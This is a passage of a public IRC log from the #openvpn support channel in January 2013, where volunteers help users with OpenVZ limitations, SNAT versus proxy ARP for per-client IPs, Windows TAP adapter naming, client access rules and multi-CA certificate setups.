reading for you CrashTM. I'd strongly suggest using a VM provider not based on OpenVZ if you want to do OpenVPN tasks 16:58 <+pekster> VZ isn't real virtualization; it's just a glorified chroot 17:00 < dioz> that isn't entirely accurate 17:00 < dioz> but a good generalization from my experience as well 17:00 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 17:00 -!- mode/#openvpn [+o dazo_afk] by ChanServ 17:00 -!- dazo_afk is now known as dazo 17:00 <+pekster> Well, it's got some fancy PID remapping and process magic going on, but it's basically just a chroot with a few bow-ties on top :P 17:01 <+pekster> It's a cool project, just not from OpenVPN's prespective... 17:01 < dioz> true 17:01 < dioz> xen hvm or kvm is what i'd suggest 17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 17:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:12 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 17:13 < CrashTM> well there is not many cheap kvm vps's 17:14 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 17:15 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:16 -!- bjh4_ [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Quit: Leaving] 17:17 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 17:18 -!- neverme [neverme@201.80.7.30] has joined #openvpn 17:19 < neverme> hi, in order to have multiple outbound ips with openvpn do I need to make several servers or is it possible make 1 and define which outbound ip a given client will use ? 17:20 <+rob0> You asked that yesterday and quit before I could answer. 17:21 <+rob0> And the answer is, 17:21 <+rob0> !notovpn 17:21 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 17:21 -!- nutron [~nutron@unaffiliated/nutron] has quit [Ping timeout: 264 seconds] 17:21 <+rob0> For example, if Linux, it could be a matter of per-client SNAT rules. 17:23 <+rob0> Or, another choice, which should work in any OS, would be CCD files with ifconfig per client to directly use those IP addresses for the tunnel, and then proxy ARP. 17:24 < neverme> rob0 yes I was short on time thx 17:25 < neverme> I see, so rather then doing a network snat source I would do a targeted snat from client to ip I want to use ? 17:26 < neverme> I will give it a try thanks again rob0 17:26 <+pekster> That's one solution, yes. OpenVPN doesn't care what you do with a packet once it gets passed to the host OS 17:27 <+rob0> I would do the direct bind and proxy ARP approach. I hate NAT. 17:28 <+pekster> As soon as I get more than a single public IP presense, I'll hate NAT too :D 17:28 < neverme> rob0 would you have to have a link to a guide on doing that ? I am familiar doing it on SNAT but that done that way 17:28 <+rob0> Once again, it varies by OS, and the only one I know is Linux. 17:28 < neverme> well I just need to assign different ips to 6 clients and I don't think it will increase 17:29 < neverme> well the server is on centos and the clients are windows xp 17:29 <+rob0> and I did post a proxy ARP solution on the mailing list once 17:29 < neverme> thanks I will look for that 17:30 <+rob0> it was Linux on both ends, but at least the server end would be applicable 17:32 < neverme> well worst case I will just use it with snat which I am familiar with but I will give it a try with ARP and see how different it is 17:33 < neverme> from what you said above it seems easier to manage with ARP 17:33 <+rob0> I think it is. 17:34 <+rob0> Use "rob0 openvpn static ip at home", should find it. I gtg, bbl. 17:34 <+rob0> (search terms) 17:34 < neverme> cool thanks 17:34 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:36 -!- Burken [~Burken@78-69-27-5-no194.tbcn.telia.com] has joined #openvpn 17:36 -!- Burken [~Burken@78-69-27-5-no194.tbcn.telia.com] has left #openvpn [] 17:36 < neverme> found it on the mailing list thanks a lot rob0 17:41 -!- neverme [neverme@201.80.7.30] has quit [Quit: Leaving] 17:44 < CrashTM> root@35948:~# iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to-source 17:44 < CrashTM> WARNING: Deprecated config file /etc/modprobe.conf, all config files belong into /etc/modprobe.d/. 17:44 < CrashTM> FATAL: Module ip_tables not found. 17:44 < CrashTM> iptables v1.4.4: can't initialize iptables table `nat': Table does not exist (do you need to insmod?) 17:44 < CrashTM> Perhaps iptables or your kernel needs to be upgraded. 17:45 < CrashTM> any ideas with this 17:46 <+pekster> The system you're on doesn't provide (or expose, as may be the case with OpenVZ) the required kernel modules. netfilter does not work without access to the relevant kernel modules 17:47 < CrashTM> any idea on how to "expose" those modules 17:47 <+pekster> No clue; I'm not familiar with OpenVZ beyond a high-level understanding of how it works (in fact, that's why I choose to not be more familiar with it) 17:48 <+pekster> The reading material I had the bot paste from earlier had some wiki links to OpenVZ's site, if that's useful 17:56 < CrashTM> ok, well can you reccomend a cheap vps host? 17:59 <+pekster> AWS gives you a year free if you're a new customer and stay within the "Free Tier" usage limits 17:59 < CrashTM> AWS? 17:59 <+pekster> You can run 1 VM 24/7 with that 17:59 < CrashTM> does it work with openvpn 17:59 <+pekster> http://aws.amazon.com/free/ 17:59 <@vpnHelper> Title: AWS Free Usage Tier (at aws.amazon.com) 18:00 <+pekster> Yes, of course; it's a xen-based virtualization platform 18:00 <+pekster> Drop in a pre-existing VM for the Ubuntu Server (the free community eddition AMI) and install/configure openvpn 18:01 <+pekster> Just be sure you understand the free tier limits, because they'll bill you a-la cart if you exceed the tier limits (and after your free year you pay metered as you would normally) 18:03 < CrashTM> im reading about the free teir but i dont understand most of it lol 18:03 < Crosshair84> hi, I have a problem with de openvpnAS 18:03 < Crosshair84> can you help me? 18:04 <+pekster> !as 18:04 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 18:04 < Crosshair84> yes 18:04 < Crosshair84> but nothin there 18:04 <+pekster> This channel is for the open-source OpenVPN codebase, no the commercial product 18:04 <+pekster> You will not find help with AS here, only OpenVPN 18:05 <+pekster> The commercial side is separate and has their own support structure (they are a company with paid employees. This is a free community channel with voulenteer help) 18:05 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 18:07 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 18:14 < dioz> can i bridge a virtual interface? 18:14 < dioz> ether0:0 ? 18:14 < dioz> eth0:0 i mean 18:21 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Peace] 18:28 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Read error: Operation timed out] 18:31 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 18:44 < Suterusu> I think thats how mines workin - But don't qoute me on tht 18:47 -!- joshie [~josh@joshie.net] has quit [Remote host closed the connection] 18:48 -!- joshie [~josh@joshie.net] has joined #openvpn 18:48 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:50 < dioz> i think i'm just gonna make the bridge in the /etc/network/interfaces 18:50 < dioz> so it's started on boot 18:51 < dioz> need to make sure i can get into this beast in a different wayt ho 18:51 < dioz> incase i lock myself out 18:51 < dioz> doubt i will 18:51 < dioz> but i just wanna make sure 18:52 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 18:54 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 18:56 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 19:07 <+pekster> dioz: The alias is just a secondary IP on the same device; I don't believe you can treat them separatly from an L2 perspective 19:08 <+pekster> The newer iproute2 utilities don't even show them like that anymore; they just list all the inet addresses assigned to an adapter (either a device or a VLAN; the VLAN is treated as a unique device to the kernel) 19:10 < dioz> well i have a VPS with two ip addresses 19:10 < dioz> i wanted to route one of the ips to a VM i have on a box in a different geogaphical location 19:10 <+pekster> That's doable with policy routing 19:11 < dioz> gonna make the tap0 interface bridge with the eth0 19:11 < dioz> and give the tap0 the second ip 19:12 < dioz> so i don't even need the second virtual interface 19:12 < dioz> can't remember the solusvm login to this vps tho 19:12 < dioz> incase i do something dumb and need serial access 19:12 < dioz> can't find the e-mail in my inbox 19:13 <+pekster> ifconfig is the old way in Linux. 'ip addr' is preferred 19:13 < dioz> yaeh 19:13 < dioz> this is how it was setup from scratch in the /etc/network/interfaces 19:13 < dioz> eth0 and eth0:0 19:13 <+pekster> Oh, yea. I try to avoid such distros when I can ;) 19:18 < thumbs> slackware has ip as well, dioz 19:18 < dioz> huh? 19:19 <+pekster> Anything modern has the ip command; their network config files still tend to use outdated syntax so it never has to change ;) 19:20 < dioz> yaeh i didn't set this interfaces file up the way it is 19:20 < dioz> i'd be using ip if it was me 19:24 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 19:38 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 19:47 -!- ch1mk3y [ch1m@ns203993.ovh.net] has left #openvpn [] 19:55 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 19:59 -!- gojafe [~rasengan@eyearesee.com] has quit [Quit: Lost terminal] 20:01 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 20:12 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 20:19 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 20:30 <+dvl> in openvpn, can I add a 'route 10.4.0.0 255.255.255.0', for example, to my *client* config if the server is not already pushing it? 20:31 <+dvl> ^ from another network 20:35 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 265 seconds] 20:35 <+pekster> dvl: Sure, the client can do that. The server still needs to route it, of course, but that's not internal to OpenVPN at that point 20:42 -!- Crosshair84 [~Crosshair@nat.crossfone.com.ar] has quit [] 21:23 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 21:35 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 22:05 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 22:05 < fu_fu> hello 22:07 < fu_fu> i need a bit of help, i upgraded my windows terminal server 2008_r2 to the new version, as well as the AD server, now there is some problem logging in to the TS 22:08 < fu_fu> are there some added auth communications in the new version? 22:08 < fu_fu> i can login as administrator but login to the domain is stopped 22:17 < pppingme> fu_fu do you have ts licenses installed? 22:19 < fu_fu> ya, and license server should be fine 22:20 < fu_fu> i rebooted the servers so they would be sure to get their drivers in order, still waiting 22:20 < pppingme> did it break after you updated the OS, or after you upped it to an AD server? or did you test in between steps??? 22:20 < fu_fu> waiting for them to come back up 22:20 < fu_fu> sorry, confusion. 22:21 < fu_fu> u just updated the OVPN to 2.3 and added two TAPs 22:21 < fu_fu> *I 22:23 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 22:26 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 22:28 < fu_fu> i think there may be a problem with my identifying the TAP ID, is it just the name or the ID string used in the config file? 22:29 <+pekster> Not normally, although IIRC you can provide the CLSID of the network adapter in your config file if you want (that's uncommon to do in practice) 22:29 <+pekster> You don't know how your own host is configured? 22:30 < fu_fu> i just added the other adapters and did not need the "dev node "line 22:32 <+pekster> I don't understand why logging into a service is a problem of OpenVPN? 22:32 <+pekster> What does RDP have to do with OpenVPN? 22:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 22:36 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Remote host closed the connection] 22:38 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 22:40 < fu_fu> i was just asking if the new revision had any additional traffic allowed over the tunnel 22:41 < fu_fu> it seems to work after i disable the additional TAPs so it must be something in that 22:41 < fu_fu> the RDP connection authenticates to a domain server at the other end of a client tunnel 22:43 <+pekster> "had any additional traffic allowed over the tunnel" <-- what does that mean? 22:46 <+pekster> I mean, 2.3 support IPv6 across the link, and perhaps that's "additional traffic", but I can't really figure out what you're asking 22:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 22:46 < fu_fu> i could authenticate before i added the TAP interfaces and upgraded 22:47 <+pekster> So the next logical question: is the VPN even up? 22:49 < fu_fu> yes, i have clients connected and pinging 22:50 < fu_fu> i think i found it, the TAP ints seem to be cleared of dns info and windows uses that for auth mapping 22:50 < fu_fu> yup, that did it 22:51 < fu_fu> driver overwrite is all, thanks 22:55 < fu_fu> so what is the standard way to find the ID of the NIC on windows? e.g. "dev node TAP0" < No. Use the display name or CLSID (see openvpn.exe --show-adapters to get that list) 23:03 <+pekster> Usually "Local Area Connection X" but you can rename the device. Techncially you could call it 'tap0' if you wanted ;) 23:06 < fu_fu> yes, that is what i did exactly, i dont really use windows all that much so i dont know clsid but thank you for elaborating, i was thinking it might be that (987213002319788123400-812347) type of ID 23:07 <+pekster> Yes 23:08 < fu_fu> cool, well gnight folks, thanks for being here 23:08 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 23:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 255 seconds] 23:42 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 23:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn --- Day changed Thu Jan 10 2013 00:05 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 00:12 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 00:14 -!- Friberg [~Friberg@h-223-133.a176.priv.bahnhof.se] has quit [Ping timeout: 260 seconds] 00:14 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has quit [Ping timeout: 260 seconds] 00:14 -!- Friberg [~Friberg@h-223-133.a176.priv.bahnhof.se] has joined #openvpn 00:14 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 00:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 248 seconds] 00:33 -!- ngharo_ [~ngharo@2001:1af8:4400:a049::] has joined #openvpn 00:35 -!- ngharo [~ngharo@2001:1af8:4400:a049:1:2:3:4] has quit [Quit: Reconnecting] 00:35 -!- ngharo_ is now known as ngharo 00:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 01:26 -!- cosmicgate- [~cosmicgat@113.210.99.83] has joined #openvpn 01:28 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:28 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:28 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:28 -!- mode/#openvpn [+o krzee] by ChanServ 01:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 264 seconds] 01:42 -!- cosmicgate-- [~cosmicgat@198.147.22.172] has joined #openvpn 01:44 -!- cosmicgate- [~cosmicgat@113.210.99.83] has quit [Ping timeout: 265 seconds] 01:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 01:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 02:03 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 02:05 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:05 -!- Azrael808 [~peter@212.161.9.162] has quit [Remote host closed the connection] 02:15 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 02:23 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 02:23 -!- Devastator- [~devas@177.18.197.67] has joined #openvpn 02:24 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 02:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 276 seconds] 02:37 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 02:40 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 02:45 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 03:00 -!- cosmicgate-- [~cosmicgat@198.147.22.172] has quit [Ping timeout: 255 seconds] 03:06 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has joined #openvpn 03:06 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has quit [Changing host] 03:06 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:22 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 240 seconds] 03:31 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 252 seconds] 03:34 -!- defswork [~andy@141.0.50.105] has joined #openvpn 03:38 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 03:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 03:51 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 03:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 03:58 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn 03:58 < Assid> heya 04:02 -!- Devastator- [~devas@177.18.197.67] has quit [Changing host] 04:02 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 04:02 -!- Devastator- is now known as Devastator 04:05 < Assid> okay so heres something weird.. i have a windows main server.. which has 2 virtual machines .. both which have a public internet ip address.. and are reachable fine.. 1 of which has openvpn working.. perfectly and i can reach it from a static ip (vpn) address.. the other i am unable to . I cant even ping the vpn gateway or from gateway to client either. 04:06 < Assid> i tried with a disabled firewall.. creating the same rules as the other windows box.. nothing works 04:13 <+pekster> Sounds like there's a difference in configuration between the VMs, or maybe between how the host treats them? 04:13 <+pekster> Clearly something has to be different 04:13 < Assid> pekster: cant find anything thats off... 04:14 < Assid> pekster: can i show you on ammy admin / teamviewer what i mean? 04:14 < Assid> maybe i need a fresh pair or eyeballs on this 04:15 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 04:18 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has joined #openvpn 04:21 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 04:21 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 04:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 276 seconds] 04:37 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has quit [Ping timeout: 256 seconds] 04:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 04:50 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 04:52 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:57 -!- genghi [~Adium@p50899732.dip.t-dialin.net] has joined #openvpn 05:09 < genghi> hi… is there a recommended way to have openvpn apply some sort of firewall rules to clients? For example, can we enforce that a connected client can only reach 192.168.0.5 and not 192.1680.6 on the server network side? 05:14 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has quit [Ping timeout: 256 seconds] 05:15 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-uxbspexqfkwdnydz] has joined #openvpn 05:22 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 05:23 -!- Assid [~kvirc@unaffiliated/assid] has quit [Ping timeout: 244 seconds] 05:28 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 05:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 255 seconds] 05:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 05:52 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 05:53 < dropje> genghi: take a look at --learn-address 05:54 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 06:01 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:01 -!- brute11k [~brute11k@89.249.235.33] has quit [Ping timeout: 240 seconds] 06:01 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Remote host closed the connection] 06:01 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 06:03 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 06:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 06:10 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 265 seconds] 06:12 < genghi> dropje: thanks.. will do 06:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 244 seconds] 06:40 -!- cosmicgate- [~cosmicgat@198.147.22.172] has joined #openvpn 06:41 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 06:45 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 06:45 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 06:47 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 06:54 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 06:56 -!- cosmicgate- is now known as cosmicgate 07:09 < thermoman> let's assume i have 2 vpn servers and some but not all users have to have access to both, others only to one of them 07:10 < thermoman> is it easily manageable that a client-cert for e.g. an admin is accepted at both vpn servers but a client-cert for e.g. a normal user only on one? 07:10 < thermoman> sure i can create a self signed CA etc etc for each server so the admin user ends up with 2 key/crl pairs 07:11 < thermoman> but if this can easily be managed with only one key/crl pair this would be really cool 07:14 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 07:24 < plaisthos> thermoman: You could use an intermediate ca 07:25 < plaisthos> or add x509 attributes in the certs whihc you check by a script 07:26 < thermoman> you mean with intermediate ca normal users get their cert signed by the intermediate CA and admins get their cert signed by the root CA? 07:27 < thermoman> /normal users get their cert signed by one of the intermediate CAs/ 07:28 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:28 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 07:29 < thermoman> plaisthos: ^ 07:30 <@ecrist> thermoman: you can use multiple CAs for a single instance of OpenVPN 07:31 <@ecrist> so, you sign admin certs with one CA, user certs with another 07:31 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen] 07:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 07:32 < thermoman> sounds complicated 07:33 < thermoman> :) 07:43 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 07:45 -!- cosmicgate [~cosmicgat@198.147.22.172] has quit [Ping timeout: 256 seconds] 07:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 07:49 -!- MarKsaitis [~MarKsaiti@85-189-231-117.v.managedbroadband.co.uk] has joined #openvpn 08:10 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 08:16 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds] 08:21 -!- MarKsaitis [~MarKsaiti@85-189-231-117.v.managedbroadband.co.uk] has quit [Ping timeout: 248 seconds] 08:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 08:29 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has joined #openvpn 08:29 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has quit [Changing host] 08:29 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:31 -!- mattock is now known as mattock_afk 08:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 256 seconds] 08:34 -!- mattock_afk is now known as mattock 08:35 -!- genghi [~Adium@p50899732.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 08:46 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 08:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 09:02 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 09:15 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 09:21 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 09:29 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 09:31 < thermoman> mhh, i can connect to my openvpn 2.1.3 server from windows vista with openvpn-2.3.0 - connection is fine but no traffic goes over the tunnel 09:31 < thermoman> is there something special with windows vista? 09:31 < thermoman> from linux it works 09:31 < thermoman> i can't even ping the remove end of the tunnel 09:31 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 09:32 < thermoman> windows gives inactivity timeout 09:32 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 09:33 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 09:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 248 seconds] 09:35 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 09:41 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has joined #openvpn 09:41 -!- ade_b [~Ade@109.58.126.90.bredband.tre.se] has quit [Changing host] 09:41 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:44 -!- Devastator [~devas@177.18.197.67] has quit [Ping timeout: 252 seconds] 09:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 09:48 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 09:50 < defswork> is there a mac osx openvpn ui client that supports management interface user authentication ? 09:53 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 10:02 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:06 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 10:16 -!- Devastator [~devas@177.18.197.67] has quit [] 10:19 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 10:22 -!- master_of_master [~master_of@p57B54741.dip.t-dialin.net] has quit [Ping timeout: 265 seconds] 10:23 -!- master_of_master [~master_of@p57B52A2D.dip.t-dialin.net] has joined #openvpn 10:24 -!- Devastator [~devas@unaffiliated/devastator] has left #openvpn [] 10:24 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 10:25 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 10:27 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Client Quit] 10:29 -!- glc_ [~gclark@adsl-99-63-81-249.dsl.chcgil.sbcglobal.net] has joined #openvpn 10:31 -!- glc_ [~gclark@adsl-99-63-81-249.dsl.chcgil.sbcglobal.net] has left #openvpn ["Leaving"] 10:31 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 10:32 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 260 seconds] 10:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 248 seconds] 10:40 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 10:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 10:45 -!- Radex [br@debian.pl] has joined #openvpn 10:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 10:47 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 248 seconds] 10:56 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 10:56 -!- Devastator [~devas@177.18.197.67] has quit [Changing host] 10:56 -!- Devastator 